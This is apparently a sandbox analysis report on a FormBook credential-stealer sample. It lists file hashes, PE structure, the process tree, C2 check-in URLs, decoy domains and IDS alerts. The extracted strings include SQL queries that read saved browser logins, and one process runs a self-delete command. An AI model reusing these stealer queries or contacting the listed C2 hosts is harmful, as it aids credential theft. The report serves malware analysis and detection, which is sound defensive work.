File name: | a2b43ba6d6a6af9f0fa07cab1a1ffd64 |
Full analysis: | https://app.any.run/tasks/f0561eef-2ba4-483d-acc9-6883842992c7 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | December 05, 2022, 20:24:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive |
MD5: | A2B43BA6D6A6AF9F0FA07CAB1A1FFD64 |
SHA1: | 0D63EE2545439DFF61486E040FB8D921BEE79AE3 |
SHA256: | 9A67166C5A81302300022D5FCF029600356460FCF3CE82FA37DB08B131A0459F |
SSDEEP: | 6144:LBnmyK4O/ekC2y6gPWJ6OC4tp8k4Hg2Y5nkjtPPraKFMP4wzSl7dlP7O/9Dj:Q7e6gPPOCm8kSIsPWK2Ptzo7dpy |
.exe | | | Win32 Executable MS Visual C++ (generic) (67.4) |
---|---|---|
.dll | | | Win32 Dynamic Link Library (generic) (14.2) |
.exe | | | Win32 Executable (generic) (9.7) |
.exe | | | Generic Win/DOS Executable (4.3) |
.exe | | | DOS Executable Generic (4.3) |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 2015-Dec-27 05:38:52 |
Detected languages: |
|
e_magic: | MZ |
---|---|
e_cblp: | 144 |
e_cp: | 3 |
e_crlc: | - |
e_cparhdr: | 4 |
e_minalloc: | - |
e_maxalloc: | 65535 |
e_ss: | - |
e_sp: | 184 |
e_csum: | - |
e_ip: | - |
e_cs: | - |
e_ovno: | - |
e_oemid: | - |
e_oeminfo: | - |
e_lfanew: | 216 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
NumberofSections: | 5 |
TimeDateStamp: | 2015-Dec-27 05:38:52 |
PointerToSymbolTable: | - |
NumberOfSymbols: | - |
SizeOfOptionalHeader: | 224 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 4096 | 23626 | 24064 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.41076 |
.rdata | 28672 | 4446 | 4608 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.14255 |
.data | 36864 | 110712 | 1536 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.22522 |
.ndata | 151552 | 32768 | 0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | |
.rsrc | 184320 | 206648 | 206848 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.67313 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 3.6686 | 67624 | UNKNOWN | English - United States | RT_ICON |
2 | 4.20636 | 38056 | UNKNOWN | English - United States | RT_ICON |
3 | 4.21554 | 26600 | UNKNOWN | English - United States | RT_ICON |
4 | 4.24892 | 21640 | UNKNOWN | English - United States | RT_ICON |
5 | 4.08716 | 16936 | UNKNOWN | English - United States | RT_ICON |
6 | 7.95631 | 15974 | UNKNOWN | English - United States | RT_ICON |
7 | 4.49335 | 9640 | UNKNOWN | English - United States | RT_ICON |
8 | 4.55083 | 4264 | UNKNOWN | English - United States | RT_ICON |
9 | 5.02221 | 2440 | UNKNOWN | English - United States | RT_ICON |
10 | 4.96191 | 1128 | UNKNOWN | English - United States | RT_ICON |
ADVAPI32.dll |
COMCTL32.dll |
GDI32.dll |
KERNEL32.dll |
SHELL32.dll |
USER32.dll |
ole32.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
868 | "C:\Users\admin\AppData\Local\Temp\a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe" | C:\Users\admin\AppData\Local\Temp\a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | Explorer.EXE | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 2 Modules
| |||||||||||||||
492 | "C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe" C:\Users\admin\AppData\Local\Temp\rjyyjwcs.j | C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe | — | a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
2564 | "C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe" | C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe | — | ycayuhnew.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
3664 | "C:\Windows\System32\rundll32.exe" | C:\Windows\System32\rundll32.exe | Explorer.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
Formbook(PID) Process(3664) rundll32.exe Decoy C2 (64)3472cc.com takecareyourhair.com kontolajigasd21.xyz daihaitrinh.net syncmostlatestinfo-file.info lovesolutionsastrologist.info angelapryan.com rio727casino.com jjsgagets.com devyatkina.online thegoldenbeautyqatar.com czytaj-unas24live.monster timepoachers.com gayxxxporn.site 72308.xyz kristanolivo.com hijrahfwd.com bmfighters.com alfamx.website handfulofbabesbows.com nationalsocialism.link mega-recarga-arg.com rytstack.com kfav77.xyz rrexec.net linetl.top freedomcleaningusa.com abofahad3478.tokyo teamvalvolineeurope.com kyty4265.com afrikannaland.info dharmatradinguae.com bqylc.buzz lifeprojectmanager.pro streeteli.site 68fk.vip wasemanntrucking.com auracreitarusblog.com dfgzyt.cyou tecnotuto.net ookkvip.com 247repairs.info tyvwotnmrlpjgl.biz courtneymporter.com gildainterior.com papiska.xyz sparrow.run tyh-group.com april-zodiac-sign.info kiaf1.site cooleyes.live partasa.com connecticutinteriors.com thelovehandles.us netinseg.website diaryranch.xyz serenaderange.com milano.icu vapeseasy.com hengruncosmetics.com vlashon.com masberlian.ink djayadiwangsa.store nicneni.xyz Strings (79)USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk systray audiodg certmgr autochk taskhost colorcpl services IconCache ThumbCache Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate
dat= f-start f-end C2www.ym2668.top/8rmt/ (PID) Process(3664) rundll32.exe Decoy C2 (64)3472cc.com takecareyourhair.com kontolajigasd21.xyz daihaitrinh.net syncmostlatestinfo-file.info lovesolutionsastrologist.info angelapryan.com rio727casino.com jjsgagets.com devyatkina.online thegoldenbeautyqatar.com czytaj-unas24live.monster timepoachers.com gayxxxporn.site 72308.xyz kristanolivo.com hijrahfwd.com bmfighters.com alfamx.website handfulofbabesbows.com nationalsocialism.link mega-recarga-arg.com rytstack.com kfav77.xyz rrexec.net linetl.top freedomcleaningusa.com abofahad3478.tokyo teamvalvolineeurope.com kyty4265.com afrikannaland.info dharmatradinguae.com bqylc.buzz lifeprojectmanager.pro streeteli.site 68fk.vip wasemanntrucking.com auracreitarusblog.com dfgzyt.cyou tecnotuto.net ookkvip.com 247repairs.info tyvwotnmrlpjgl.biz courtneymporter.com gildainterior.com papiska.xyz sparrow.run tyh-group.com april-zodiac-sign.info kiaf1.site cooleyes.live partasa.com connecticutinteriors.com thelovehandles.us netinseg.website diaryranch.xyz serenaderange.com milano.icu vapeseasy.com hengruncosmetics.com vlashon.com masberlian.ink djayadiwangsa.store nicneni.xyz Strings (79)USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk systray audiodg certmgr autochk taskhost colorcpl services IconCache ThumbCache Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate
dat= f-start f-end C2www.ym2668.top/8rmt/ | |||||||||||||||
3564 | /c del "C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe" | C:\Windows\System32\cmd.exe | — | rundll32.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
912 | C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | — | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
PID | Process | Filename | Type | |
---|---|---|---|---|
868 | a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | C:\Users\admin\AppData\Local\Temp\dxlnbanzq.e | binary | |
MD5:F6710918E3ECDBA55AA451FB1B08742D | SHA256:CC573825ABA59339F11629B7FE1ED9ADF098E5F12004F441948FE45FCC12A5A7 | |||
868 | a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | C:\Users\admin\AppData\Local\Temp\nsg9915.tmp | binary | |
MD5:99DBE321B839C5C8611FCF92D591D4B3 | SHA256:093C821C9C687A401316AD33232533EE8D71BCC8A768F6BBAE6D10686F8A9F33 | |||
868 | a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | C:\Users\admin\AppData\Local\Temp\rjyyjwcs.j | binary | |
MD5:45CBFD24B9943772008F524A20E0A56F | SHA256:AFEF884E713661B15D8639AC7268B667742EBE67B0E031E7D617F2DD2D5813FF | |||
868 | a2b43ba6d6a6af9f0fa07cab1a1ffd64.exe | C:\Users\admin\AppData\Local\Temp\ycayuhnew.exe | executable | |
MD5:D3749F4E6710B8D5BEB987F07A5E8580 | SHA256:EDFA8CF65BBE6A0AD70CFC86A451B4AC86D034EFC77F4E117151FAA48AF2D73F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
912 | Explorer.EXE | GET | 410 | 3.64.163.50:80 | http://www.kiaf1.site/8rmt/?LnJL=Drw+5op+ENV0iYqxo8M7C5N0S+6MRM94/NrVrmq26mmPDOavBy4xzBZqerrVpLizXmCFCw==&jPh8=KnJHvh | US | html | 108 b | malicious |
912 | Explorer.EXE | GET | 403 | 23.227.38.74:80 | http://www.streeteli.site/8rmt/?LnJL=gDBz1LMvaRAn16UL/TmQ59mIs755h3wczlOLkLbFqqJke4iY2LTYbrsZzKAEVkVzUYfKdg==&jPh8=KnJHvh | CA | html | 5.03 Kb | malicious |
912 | Explorer.EXE | GET | 301 | 188.114.97.3:80 | http://www.ym2668.top/8rmt/?LnJL=pR67c+KOD4QUEFVHl1o9/L5k9VWq5eUb2FdFXw4R7kp/J3UeEjbGljkaWpuPR6UQ7uKBaQ==&jPh8=KnJHvh | US | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
912 | Explorer.EXE | 188.114.97.3:80 | www.ym2668.top | CLOUDFLARENET | NL | malicious |
912 | Explorer.EXE | 3.64.163.50:80 | www.kiaf1.site | AMAZON-02 | DE | malicious |
912 | Explorer.EXE | 23.227.38.74:80 | www.streeteli.site | CLOUDFLARENET | CA | malicious |
Domain | IP | Reputation |
---|---|---|
www.kiaf1.site |
| malicious |
www.streeteli.site |
| malicious |
www.masberlian.ink |
| unknown |
www.ym2668.top |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
912 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
912 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
912 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
912 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |